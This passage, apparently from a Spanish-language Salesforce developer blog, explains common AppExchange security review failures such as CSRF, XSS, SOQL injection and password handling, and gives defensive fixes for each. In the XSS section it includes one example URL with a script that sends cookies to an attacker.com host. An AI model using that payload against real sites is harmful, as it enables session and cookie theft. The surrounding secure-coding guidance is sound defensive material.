Code Analyzer y PMD para VS Code pueden ayudarlo a detectar estos problemas en las aplicaciones de Salesforce, y los escáneres de aplicaciones web como Burp Suite , Chimera u OWASP ZAP también pueden ayudarlo a detectar estos problemas en sus integraciones externas y aplicaciones web.

Obtenga más información sobre cómo verificar los seguimientos de la pila e información detallada sobre las excepciones en el número 13.

#7 – CSRF

¿Qué es esto?

La falsificación de solicitudes entre sitios (CSRF) es un tipo de ataque que engaña a una víctima para que ejecute acciones no deseadas en una aplicación web en la que está autenticada. Explotar la confianza que un sitio tiene en el navegador del usuario puede llevar a acciones potencialmente dañinas, como cambiar direcciones de correo electrónico y contraseñas, o incluso realizar transacciones sin el conocimiento o consentimiento del usuario.

En la plataforma Salesforce, existe un token anti-CSRF para contrarrestar dichos ataques, que ofrece protección mientras se utilizan controladores y métodos estándar. Sin embargo, los desarrolladores pueden eludir involuntariamente estas salvaguardas anti-CSRF al crear sus propios métodos de acción.

¿Cómo puedo abordar esto?

En general, las aplicaciones web pueden prevenir ataques CSRF principalmente implementando tokens anti-CSRF, que son valores únicos y específicos del usuario incluidos en cada solicitud de cambio de estado para verificar la fuente. Además, deben adoptar la práctica de cookies del mismo sitio, que impide que el navegador envíe la cookie junto con solicitudes entre sitios, mitigando así los riesgos de CSRF.

Para páginas de Visualforce:

  • Al crear páginas de Visualforce, evite utilizar solicitudes HTTP GET que cambien de estado; use POST o PUT para cambios de estado en su lugar
  • No ejecute acciones automáticas ni cambie el estado (por ejemplo, operaciones DML) al cargar la página.
  • Otra técnica de mitigación implica agregar una página de confirmación intermedia antes de realizar la acción, donde el usuario puede confirmar que tenía la intención de realizar esa acción.

Para componentes Lightning:

  • De manera similar a las páginas de Visualforce, evite cambiar el estado o ejecutar acciones al cargar un componente Lightning, mediante enlaces como init (para Aura) ,connectedCallback , renderedCallback o constructor .

Al realizar llamadas API:

  • Para las API que no son de Salesforce, es posible que también desee agregar su propio token CSRF.

CSRF es uno de los tipos de problemas de seguridad más complicados, por lo que vale la pena invertir en aprender más sobre él en profundidad. Para los paquetes de Salesforce, existe excelente documentación para desarrolladores y un módulo Trailhead como referencia.

Para otros tipos de aplicaciones web, es posible que desees consultar la documentación de OWASP .

Los escáneres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , también pueden ayudarle a detectar estos problemas en sus aplicaciones web externas.

N.º 8: secuencias de comandos entre sitios (XSS) almacenadas y reflejadas

¿Qué es esto?

Los ataques de secuencias de comandos entre sitios (XSS) son problemas de inyección en los que se insertan secuencias de comandos dañinas en sitios web confiables. Ocurren cuando un atacante explota una aplicación web para enviar código malicioso, a menudo un script del lado del cliente, a un usuario diferente. Estos ataques explotan fallas en aplicaciones web que utilizan entradas de usuario no validadas o codificadas en su salida.

En un ataque XSS, el navegador de un usuario desprevenido ejecuta el script malicioso, creyendo que proviene de una fuente confiable. Esto permite que el script acceda a cookies, tokens de sesión u otros datos confidenciales almacenados en el navegador. Incluso puede modificar el contenido HTML de la página.

Los ataques XSS almacenados son de tipo persistente, en los que la aplicación web almacena la entrada maliciosa y luego se muestra a los usuarios. Los ataques XSS reflejados, por otro lado, generalmente ocurren cuando se inyecta código malicioso en una URL, que se ejecuta cuando un usuario hace clic en ella (por ejemplo: http://example.com/search?query=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie;</script> ).

Los motivos por los que su aplicación podría ser susceptible incluyen:

  • Entrada no validada : las aplicaciones pueden aceptar entradas del usuario y usarlas o mostrarlas en una página sin validarlas adecuadamente (para garantizar que no contenga código/scripts ejecutables).
  • Campos de texto enriquecido : almacenar entradas en campos RTF de Salesforce es riesgoso porque admiten contenido HTML, por lo que debe validar la entrada para evitar que se almacenen XSS.
  • Páginas de Visualforce : pueden ser susceptibles si utilizan entradas generadas por el usuario en el cuerpo HTML o en JavaScript sin un escape de entrada o codificación de salida adecuados.
  • Componentes web Aura y Lightning (LWC) : aunque tienen protecciones integradas contra XSS, los desarrolladores pueden evitar estas protecciones mediante cosas como el uso de la propiedad innerHTML , lwc:dom=”manual” o el componente lightning:formattedRichText sin la validación de entrada adecuada.
  • Parámetros de URL : las aplicaciones pueden usarlos directamente en el HTML o JavaScript de una página sin validación (lo que lleva a XSS reflejado).

¿Cómo puedo abordar esto?

Su objetivo principal debe ser evitar la manipulación de DOM, pero también recomendamos practicar el filtrado de entrada y la codificación de salida, que incluyen:

  • Evite la manipulación del modelo de objetos de documento (DOM): en su lugar, utilice técnicas como directivas de plantilla y evite funciones de JavaScript potencialmente inseguras (por ejemplo, eval() , DOMParser.parseFromString() , Document.implementation.createHTMLDocument() , setTimeout() , setInterval() )
  • Filtrado de entrada: asegúrese de que la entrada del usuario no contenga código ejecutable mediante el uso de expresiones regulares y listas de bloqueo o listas de permitidos (por ejemplo, filtre los caracteres comúnmente utilizados en el código, como '<', '>', comillas simples o dobles, ' /', ';', corchetes, paréntesis u operadores matemáticos o lógicos como '+', '&' o '-')
  • Codificación de salida : asegúrese de que si el código ejecutable pasara el filtrado de entrada, no se interprete como código al convertir caracteres "peligrosos" en versiones de texto inofensivas (por ejemplo, '&; debe convertirse a &amp; y '<' o '>' debe convertirse a &lt; y &gt;)

Este módulo de Trailhead explica exactamente cómo mitigar XSS con estas técnicas, y nuestra documentación para desarrolladores también es útil aquí. Para obtener consejos específicos sobre la protección contra XSS en componentes Lightning, consulte la página Seguridad Lightning en la Guía de codificación segura.

Para aplicaciones web que no son de Salesforce, también puede consultar la documentación de OWASP para obtener consejos adicionales.

Los escáneres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , también pueden ayudarle a detectar estos problemas.

#9: JavaScript no está en recursos estáticos

¿Qué es esto?

Muchos paquetes administrados por Salesforce no pasan la revisión de seguridad por no almacenar JavaScript como recursos estáticos en sus paquetes y, en su lugar, se vinculan a archivos JavaScript alojados externamente con etiquetas <script> . La razón principal de esta regla es que permite un control de versiones mucho más seguro y garantiza la integridad de los archivos JavaScript en su paquete de Salesforce incluso si la fuente externa está comprometida.

¿Cómo puedo abordar esto?

Nuestra regla es que todos los recursos de script y estilo deben agregarse al paquete como recursos estáticos y luego cargarse con una etiqueta <apex:includeScript> en su página (para Visualforce) o un ltng:require en su .cmp o .app. marcado (para Aura).

Nota: Si tiene un LWC, defina los módulos JavaScript que importe a su componente o use la función loadScript para cargar un archivo JavaScript de recursos estáticos.

Para paquetes que no son LWC, la mejor manera de verificar este problema es buscar manualmente su código fuente para asegurarse de que todas las bibliotecas de JavaScript estén almacenadas como recursos estáticos, no cargadas dinámicamente a través de hipervínculos.

Para situaciones en las que esto no sea factible, recomendamos programar una cita en horario de oficina técnica para analizar su caso de uso. Es posible obtener una excepción en ciertos casos.

Obtenga más información sobre este problema en nuestra documentación para desarrolladores .

#10 – Inyección SOQL

¿Qué es esto?

La inyección SOQL es la versión específica de Salesforce de la inyección SQL. Ocurre cuando una entrada no validada proporcionada por el usuario se inserta directamente en una consulta SOQL dinámica. Si la entrada no está validada, puede incluir comandos SOQL que modifican efectivamente la declaración SOQL y engañan a la aplicación para que ejecute comandos no deseados.

¿Cómo puedo abordar esto?

La forma más sencilla de evitar el problema es evitar consultas dinámicas en favor de consultas estáticas y utilizar variables vinculantes. De lo contrario, deberá validar estrictamente las entradas del usuario antes de usarlas en consultas mediante técnicas como encasillamiento, lista blanca de entradas o escape.

Code Analyzer , PMD para VS Code y Checkmarx también pueden ayudarlo a escanear su código.

Para obtener más información, consulte nuestro módulo Trailhead o revise nuestra documentación para desarrolladores .

Para aplicaciones que no son de Salesforce, es posible que desee obtener más información sobre la inyección SQL en la guía OWASP . Los escáneres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , también pueden ayudar a identificar problemas de inyección SQL.

#11 — Lightning: carga CSS inadecuada

¿Qué es esto?

Similar al problema de usar etiquetas <script> o <link> para cargar JavaScript en sus paquetes, usar etiquetas <link> o <style> para cargar CSS en lugar de <apex:stylesheet> (Visualforce) o <ltng:require> ( Aura) se considera una práctica insegura. Estas etiquetas <link> y <style> pueden hacer referencia a recursos externos o en línea que contienen CSS o JavaScript, y la arquitectura de seguridad Lightning Web Security (LWS) de Salesforce no los controla ni los desinfecta.

Para los componentes de Aura, en particular, el uso de <ltng:require> también permite a Salesforce aplicar correctamente las reglas de seguridad LWS y garantizar que el CSS que está cargando esté correctamente aislado y no incluya código o estilos JavaScript no seguros que puedan afectar negativamente a otros. partes de su aplicación Salesforce.

¿Cómo puedo abordar esto?

Para hacer referencia a un recurso CSS externo que haya subido como recurso estático, use una etiqueta <apex:stylesheet> en su página (para Visualforce) o una etiqueta <ltng:require> en su marcado .cmp o .app (para Aura ). Busque el código fuente de su paquete para asegurarse de que no haya utilizado etiquetas <link> o <style> en ningún lugar para cargar recursos CSS.

Nota: Si tiene una LWC, no puede encontrarse con este problema de todos modos porque, al igual que las etiquetas <script> , las etiquetas <style> ya están bloqueadas para su uso dentro de las plantillas HTML. En su lugar, incluiría su CSS en el archivo CSS asociado de su componente o usaría la función loadStyle para cargar un archivo CSS de recursos estáticos.

Puede encontrar más información en nuestra documentación para desarrolladores .

#12: JavaScript en Salesforce DOM (solo experiencia clásica)

¿Qué es esto?

Salesforce tiene reglas estrictas sobre el uso de JavaScript y una de esas reglas es que JavaScript no se puede ejecutar directamente dentro del contexto de la aplicación Salesforce. Esto significa que no puede incluir bloques de JavaScript directamente dentro de los componentes que se ejecutan en Salesforce DOM, como HomePageComponents, WebLinks, Custom Buttons, etc.

En cambio, todo JavaScript debe residir bajo el dominio de espacio de nombres de su aplicación en las páginas de Visualforce que usted controla, de modo que el JavaScript personalizado esté esencialmente aislado del DOM principal de Salesforce. Eso significa que no puede usar JavaScript para crear botones personalizados, pestañas web, componentes de página de inicio y elementos similares (por ejemplo, incluir controladores de eventos de JavaScript onclick en botones personalizados podría ser motivo de falla).

¿Cómo puedo abordar esto?

Esto es algo que deberá verificar manualmente en el código fuente de su paquete Salesforce. Verifique y asegúrese de que no haya utilizado JavaScript para crear botones personalizados, pestañas web, componentes de la página de inicio u otros elementos similares, y verifique que cualquier JavaScript personalizado esté incluido solo en el dominio de su aplicación con espacio de nombres en las páginas de VisualForce que controla como parte de su aplicación.

Una forma de verificar esto es buscar el texto <openType>onClickJavaScript</openType> en los archivos de metadatos de la aplicación (a menudo en archivos XML como weblink/something.weblink) y, si lo encuentra, asegúrese de eliminarlo. Incluso si su aplicación solo está destinada a usarse en Lightning Experience, si la vulnerabilidad está presente para los usuarios en modo Clásico, el paquete no se puede aprobar.

Esta regla en particular no está especialmente bien documentada, pero puede leer más en el documento Lista de verificación de revisión de seguridad de AppExchange (se requiere iniciar sesión en la comunidad de socios).

#13 — Divulgación de información en páginas de error y excepciones

¿Qué es esto?

En el contexto de la revisión de seguridad de AppExchange, este término se refiere específicamente a situaciones (generalmente en aplicaciones o servicios web que no son de Salesforce o fuera de plataforma) donde sus páginas de error muestran datos confidenciales del sistema o información de depuración. Por ejemplo, a veces las páginas de error incluyen seguimientos de pila completos que muestran cómo se hace referencia internamente a los objetos o rutas de archivo relativas al lugar donde está instalada la aplicación. A veces, incluso la información confidencial queda expuesta de esta manera.

¿Cómo puedo abordar esto?

Busque en su base de código llamadas que causen excepciones o que los seguimientos de pila se representen en cadenas o flujos de salida, y realice pruebas que puedan causar errores, como entradas no válidas, entradas vacías, entradas demasiado largas, acceso a páginas internas sin autenticación, omisión de aplicaciones. flujo, etc

La herramienta de fuzzing de Burp Suite puede ser una gran ayuda en este caso.

También puede obtener excelentes consejos para realizar pruebas de seguimiento de pila a través de esta guía de OWASP .

#14 — Componentes de Aura: componente externo de CSS

¿Qué es esto?

Se supone que los componentes de Aura son pequeños, autónomos, reutilizables y reposicionables. CSS que evita la encapsulación de componentes (a través de .THIS) o que utiliza un posicionamiento no estándar (por ejemplo, flotante o posición: absoluta o fija) infringe estas garantías y puede interferir con la visualización de otros componentes. En particular, el uso del posicionamiento absoluto en CSS es la razón principal de este tipo de falla.

Si bien esto puede no parecer un problema de seguridad a primera vista, puede alterar el diseño del sitio web de Salesforce y viola el espíritu del modelo de seguridad de Lightning, donde los componentes están estrictamente aislados y se garantiza que permanecerán en su propio carril.

¿Cómo puedo abordar esto?

Este es otro problema que debes verificar manualmente. Básicamente, busque en el CSS de su componente Aura, especialmente para posicionamiento absoluto/fijo o ancho y alto fijos. También recomendamos revisar nuestra documentación para asegurarse de que está siguiendo todas las reglas CSS correctas.

#15 — Canal de mensajes expuesto

¿Qué es esto?

Este término se refiere específicamente a los casos en los que no ha configurado el indicador isExposed en Lightning Message Channel en falso. Dado que esto proporciona acceso a la API del Servicio de mensajes Lightning (LMS), que le permite publicar y suscribirse a mensajes en todo el DOM y entre Aura, Visualforce y Lightning Web Components, debe establecerse en falso a menos que sea realmente necesario.

¿Cómo puedo abordar esto?

Tiene dos opciones, según su caso de uso, que incluyen:

  1. Registre un ticket de soporte para solicitar que se habilite la eliminación de componentes administrados para su paquete u organización de Dev Hub y elimine el componente del paquete. Si no puede hacerlo (por ejemplo, si esto afectaría la funcionalidad de los suscriptores que dependen de canales de mensajes expuestos), puede dejar el componente en el paquete y simplemente no usarlo (asegúrese de mencionar esto específicamente en un mensaje falso). documento positivo sobre su presentación).
  2. Si tiene que utilizar un componente de canal LMS, asegúrese de tener isExposed=false . Esto debe hacerse creando un nuevo componente de canal LMS porque los componentes existentes con isExposed=true no pueden cambiar isExposed=false . Utilice únicamente el componente recién creado en el código.

Más información está disponible en la documentación .

#16 – Información confidencial en URL

¿Qué es esto?

Esto se refiere a una situación en la que se envía información confidencial de larga duración en URL (por ejemplo, un ID o secreto de cliente, o un nombre de usuario/contraseña). En realidad, esto puede llevar a que se filtren secretos a largo plazo de varias maneras posibles. Por ejemplo:

  • Las URL completas a menudo se almacenan en servidores en registros de texto sin cifrar que pueden no almacenarse de forma segura y pueden ser vistos por el personal o comprometidos por un tercero.
  • Los motores de búsqueda indexan URL y almacenan inadvertidamente información confidencial
  • Almacenamiento de rutas URL completas en el historial del navegador local, caché del navegador, marcadores y marcadores sincronizados entre dispositivos
  • Información de URL enviada a aplicaciones web de terceros a través del encabezado de referencia o expuesta a scripts de terceros en la página

¿Cómo puedo abordar esto?

Burp Suite puede ayudarle aquí para aplicaciones web que no sean de Salesforce o fuera de plataforma, pero en general recomendamos comprobar manualmente su aplicación para detectar cualquier caso en el que se envíen secretos a largo plazo a través de URL. Dependiendo de su caso de uso, es posible que deba realizar cambios, como usar solicitudes POST en lugar de solicitudes GET, cambiar su método de autenticación (OAuth 2.0 es generalmente ideal) y emplear cifrado y mejores métodos de almacenamiento de secretos.

La guía OWASP es un gran recurso a seguir.

#17 – Punto final inseguro

¿Qué es esto?

El nombre de esta vulnerabilidad simplemente se refiere a situaciones en las que se utiliza HTTP en lugar de HTTPS.

¿Cómo puedo abordar esto?

Las herramientas de escaneo pueden ser de ayuda, pero una forma aún más segura de verificar esto es buscar en el código fuente enlaces HTTP y cambiarlos a HTTPS. Puede aprender un poco más sobre cómo esto mejora la seguridad en esta página de OWASP .

#18 — Enumeración de nombre de usuario o correo electrónico

¿Qué es esto?

Por lo general, este problema solo surge en aplicaciones web externas fuera de la plataforma Salesforce. Se refiere a una situación en la que los atacantes pueden enumerar listas de nombres de usuario o correos electrónicos de su base de usuarios, generalmente analizando cambios en mensajes de error en funciones de inicio de sesión, funciones de olvido de contraseña o registros de cuentas. Los atacantes suelen hacer esto para poder comprobar si hay contraseñas reutilizadas de bases de datos comprometidas y fugas o volcados de contraseñas.

¿Cómo puedo abordar esto?

Verifique sus mensajes de error para registros de cuentas, recuperación de contraseñas, intentos de inicio de sesión, etc., y asegúrese de que su mensaje de error sea el mismo independientemente de si el nombre de usuario o el correo electrónico ingresado es válido.

Por ejemplo, muchos sitios incluyen un mensaje genérico, como: "Si dicho usuario existe, recibirá un correo electrónico con un restablecimiento de contraseña". Este tipo de mensaje general evita confirmar la existencia de un nombre de usuario o correo electrónico.

Por supuesto, en determinadas situaciones, puede ser inevitable (por ejemplo, durante el registro de una cuenta, es posible que deba confirmar que se ha utilizado un nombre de usuario). En esas situaciones, intente implementar controles que impidan la enumeración por fuerza bruta, como captchas para evitar que los robots eliminen su formulario de registro.

Burp Suite es una excelente herramienta para verificar esto, pero si no la tiene, también puede revisar sus funcionalidades de inicio de sesión manualmente.

OWASP tiene una guía útil para evitar la enumeración de correos electrónicos y nombres de usuarios.

#19 — Gestión de contraseñas

¿Qué es esto?

En ocasiones, el equipo de seguridad falla en sitios y aplicaciones web externos (que no sean Salesforce) por tener políticas de contraseñas problemáticas, como por ejemplo:

  • Permitir la reutilización de la misma contraseña cuando es necesario restablecerla
  • No solicitar la contraseña anterior cuando se permite a los usuarios establecer una nueva contraseña
  • Para restablecer la contraseña, enviar una contraseña temporal al correo electrónico de un usuario en texto sin formato
  • Dejar contraseñas predeterminadas en los usuarios raíz del servidor o de la base de datos

¿Cómo puedo abordar esto?

Además de evitar las situaciones anteriores, consulte la Hoja de referencia de autenticación de OWASP para obtener algunas pautas sobre cómo establecer políticas de contraseñas seguras:

Burp Suite también es muy útil para identificar problemas relacionados con las contraseñas (por ejemplo, puede usarlo para intentar forzar sus páginas de inicio de sesión).

#20 – Eco de contraseña

¿Qué es esto?

Esto es un poco diferente del problema de administración de contraseñas descrito anteriormente. Un eco de contraseña se refiere a situaciones en las que las contraseñas se reflejan en texto sin formato en la interfaz de usuario (como cuando el usuario visita su propia página de configuración) o en llamadas API/respuestas JSON.

¿Cómo puedo abordar esto?

Asegúrese de que su contraseña no se revele ni se transmita en texto sin formato en ninguna parte de su aplicación. Asegúrese de que en las páginas de configuración u otras páginas que muestran secretos, se muestren solo como asteriscos (se pueden mostrar al hacer clic en el botón si es necesario).

Consulte la hoja de referencia sobre almacenamiento de contraseñas de OWASP para obtener más información.

Burp Suite , o quizás Chimera u OWASP ZAP , también pueden ayudarle a detectar estos problemas.

Recursos adicionales

Si su solución incluye sitios web o aplicaciones web personalizados que no son de Salesforce, le recomendamos encarecidamente invertir en una licencia de Burp Suite si es financieramente viable para su organización. Burp Suite es una de las mejores herramientas de seguridad del mercado y también la utiliza mucho nuestro propio equipo de seguridad de productos. Chimera u OWASP ZAP son alternativas completamente gratuitas, pero prepárate para invertir más tiempo en términos de revisión manual, ya que carecen de muchas de las potentes funciones/herramientas que tiene Burp Suite.

Nota: Si su oferta se integra con aplicaciones o servicios web que no son de su propiedad, no intente escanear los puntos finales hasta que haya obtenido el permiso del propietario.

Salesforce Product Security también utiliza Code Analyzer , PMD para VS Code y Checkmarx para revisar el código fuente del paquete Salesforce. También utilizan la base de datos CVE y el escáner Qualys SSL en la mayoría de los envíos.

Si tiene problemas de seguridad y necesita orientación técnica, los socios ISV pueden registrarse para obtener horas de oficina gratuitas con nuestros ingenieros de seguridad a través del Portal de seguridad para socios .

Por último, no podemos recomendar lo suficiente Trailhead en términos de preparación para revisiones de seguridad. Vale la pena dedicar tiempo a la ruta Desarrollar aplicaciones web seguras y también acabamos de renovar el módulo Revisión de seguridad de AppExchange , que analiza el proceso de envío de un extremo a otro.

Sobre el Autor

Anika Teppo es evangelista técnica en Salesforce. Ha estado trabajando con el equipo de revisión de seguridad de AppExchange en Salesforce desde 2017, y su función actual consiste en hacer que Salesforce Labs y las soluciones internas se revisen y publiquen en AppExchange.

Obtenga las últimas publicaciones de blog y episodios de podcasts para desarrolladores de Salesforce a través de Slack o RSS.

Añadir a holgura Suscríbete a RSS

Seguir leyendo